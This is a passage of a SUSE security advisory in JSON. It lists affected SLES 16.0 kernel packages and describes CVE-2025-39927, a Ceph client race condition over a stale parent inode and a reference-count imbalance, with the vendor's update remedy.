"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-39913"
},
{
"cve": "CVE-2025-39927",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39927"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nceph: fix race condition validating r_parent before applying state\n\nAdd validation to ensure the cached parent directory inode matches the\ndirectory info in MDS replies. This prevents client-side race conditions\nwhere concurrent operations (e.g. rename) cause r_parent to become stale\nbetween request initiation and reply processing, which could lead to\napplying state changes to incorrect directory inodes.\n\n[ idryomov: folded a kerneldoc fixup and a follow-up fix from Alex to\n move CEPH_CAP_PIN reference when r_parent is updated:\n\n When the parent directory lock is not held, req-\u003er_parent can become\n stale and is updated to point to the correct inode. However, the\n associated CEPH_CAP_PIN reference was not being adjusted. The\n CEPH_CAP_PIN is a reference on an inode that is tracked for\n accounting purposes. Moving this pin is important to keep the\n accounting balanced. When the pin was not moved from the old parent\n to the new one, it created two problems: The reference on the old,\n stale parent was never released, causing a reference leak.\n A reference for the new parent was never acquired, creating the risk\n of a reference underflow later in ceph_mdsc_release_request(). This\n patch corrects the logic by releasing the pin from the old parent and\n acquiring it for the new parent when r_parent is switched. This\n ensures reference accounting stays balanced. ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39927",
"url": "https://www.suse.com/security/cve/CVE-2025-39927"
},
{
"category": "external",
"summary": "SUSE Bug 1250738 for CVE-2025-39927",
"url": "https://bugzilla.suse.com/1250738"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
